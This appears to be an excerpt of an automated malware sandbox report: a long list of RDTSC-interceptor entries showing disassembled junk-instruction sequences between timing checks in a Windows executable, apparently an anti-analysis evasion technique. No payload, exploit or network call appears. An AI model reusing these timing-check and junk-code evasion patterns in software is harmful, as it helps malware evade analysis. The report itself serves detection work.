                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EA733 second address: 11EA740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EA740 second address: 11EA744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EAA0F second address: 11EAA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EAA13 second address: 11EAA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EAB7A second address: 11EAB80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EAB80 second address: 11EAB99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EB6C3 second address: 11EB6CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11EBDE8 second address: 11EBDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527C9Ah 0x00000009 jne 00007F65CC527C96h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F1897 second address: 11F18CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF3h 0x00000007 jmp 00007F65CD2EDEF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007F65CD2EDF06h 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F4B60 second address: 11F4B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F65CC527C9Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F4701 second address: 11F4709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F8410 second address: 11F8418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F8418 second address: 11F841D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F9B93 second address: 11F9BC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007F65CC527C96h 0x0000000d jno 00007F65CC527C96h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F65CC527CA8h 0x0000001b jng 00007F65CC527C96h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 11F9BC7 second address: 11F9BFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEFh 0x00000007 jbe 00007F65CD2EDEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 popad 0x00000016 jg 00007F65CD2EDF15h 0x0000001c push ecx 0x0000001d pushad 0x0000001e popad 0x0000001f jns 00007F65CD2EDEE6h 0x00000025 pop ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 jnc 00007F65CD2EDEE6h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120C323 second address: 120C32F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120C32F second address: 120C343 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F65CD2EDEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F65CD2EDEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120C343 second address: 120C347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120C347 second address: 120C351 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65CD2EDEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120BD7F second address: 120BD9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F65CC527CA6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120BD9D second address: 120BDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120BF5A second address: 120BF64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120BF64 second address: 120BF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 120BF6C second address: 120BF72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 12123DF second address: 12123E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 121F151 second address: 121F155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1223734 second address: 122373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 122373A second address: 1223749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F65CC527C9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1223896 second address: 12238AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF2h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1228274 second address: 1228286 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1228286 second address: 12282BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F65CD2EDEEEh 0x0000000c jo 00007F65CD2EDEE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push edi 0x00000018 pop edi 0x00000019 jo 00007F65CD2EDEE6h 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F65CD2EDEEDh 0x00000026 jbe 00007F65CD2EDEE6h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 12364D1 second address: 12364D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 12364D5 second address: 12364DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 123633A second address: 1236340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 12346CB second address: 12346CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 12346CF second address: 12346D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65CC527C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 12346D9 second address: 12346ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65CD2EDEEEh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1247206 second address: 124721F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 124721F second address: 1247229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F65CD2EDEE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1247229 second address: 124723C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F65CC527CA4h 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 124723C second address: 1247242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125B692 second address: 125B696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125A6A2 second address: 125A6C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F65CD2EDEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F65CD2EDEF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F65CD2EDEE6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125A6C8 second address: 125A6CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125AAE8 second address: 125AAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125AC76 second address: 125AC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125CE25 second address: 125CE3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 jnp 00007F65CD2EDEE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125CE3A second address: 125CE47 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65CC527C98h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 125FA55 second address: 125FA8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F65CD2EDEE8h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dh, ah 0x00000025 push 00000004h 0x00000027 mov dx, cx 0x0000002a push A16995A6h 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jnp 00007F65CD2EDEE6h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1178439 second address: 117843F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1178651 second address: 1178655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 1178655 second address: 117865B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0405 second address: 56F0417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CD2EDEEEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0417 second address: 56F046C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F65CC527C9Dh 0x00000011 sbb ah, FFFFFFF6h 0x00000014 jmp 00007F65CC527CA1h 0x00000019 popfd 0x0000001a mov di, cx 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 jmp 00007F65CC527CA8h 0x00000027 push eax 0x00000028 push edx 0x00000029 mov esi, 72CEBAC7h 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0486 second address: 56F048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F048A second address: 56F0499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 56F0499 second address: 56F04EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F65CD2EDEF9h 0x00000015 or ecx, 2B818026h 0x0000001b jmp 00007F65CD2EDEF1h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57207BB second address: 57207CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57207CA second address: 57207ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57207ED second address: 5720863 instructions: 0x00000000 rdtsc 0x00000002 mov ah, D1h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F65CC527CA5h 0x0000000c sbb ecx, 0EA81856h 0x00000012 jmp 00007F65CC527CA1h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F65CC527CA1h 0x0000001f xchg eax, ebp 0x00000020 pushad 0x00000021 jmp 00007F65CC527C9Ch 0x00000026 mov ax, 9CC1h 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F65CC527CA6h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720863 second address: 5720872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720872 second address: 572088A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65CC527CA4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572088A second address: 57208B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CD2EDEEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65CD2EDEF0h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57208B0 second address: 57208B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57208B4 second address: 57208BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57208BA second address: 5720910 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007F65CC527CA8h 0x0000000b sub al, 00000028h 0x0000000e jmp 00007F65CC527C9Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F65CC527CA9h 0x0000001d xchg eax, ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov esi, edi 0x00000023 mov ebx, 0C98ED2Ah 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720910 second address: 5720916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720916 second address: 5720944 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F65CC527CA0h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movzx ecx, di 0x00000018 mov edx, 0F41345Ch 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720944 second address: 572094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572094A second address: 572094E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572094E second address: 572095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572095D second address: 5720961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720961 second address: 5720967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720967 second address: 572096D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 572096D second address: 5720971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720971 second address: 5720975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720975 second address: 57209AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-04h] 0x0000000b jmp 00007F65CD2EDEF2h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65CD2EDEF7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57209AC second address: 57209B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57209B2 second address: 57209B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 57209B6 second address: 5720A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F65CC527C9Fh 0x00000013 sub esi, 1BDFF7FEh 0x00000019 jmp 00007F65CC527CA9h 0x0000001e popfd 0x0000001f mov ch, 94h 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F65CC527CA6h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720A15 second address: 5720A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AA5 second address: 5720AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, B3BCh 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AAE second address: 5720AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F65CD2EDEEEh 0x0000000b sbb eax, 1B46F2D8h 0x00000011 jmp 00007F65CD2EDEEBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F65CD2EDF27h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F65CD2EDEF5h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AF4 second address: 5720AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AFA second address: 5720AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720AFE second address: 5720B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B34 second address: 5720B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exeRDTSC instruction interceptor: First address: 5720B3A second address: 5720B53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65CC527C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov dx, si 0x00000010 rdtsc
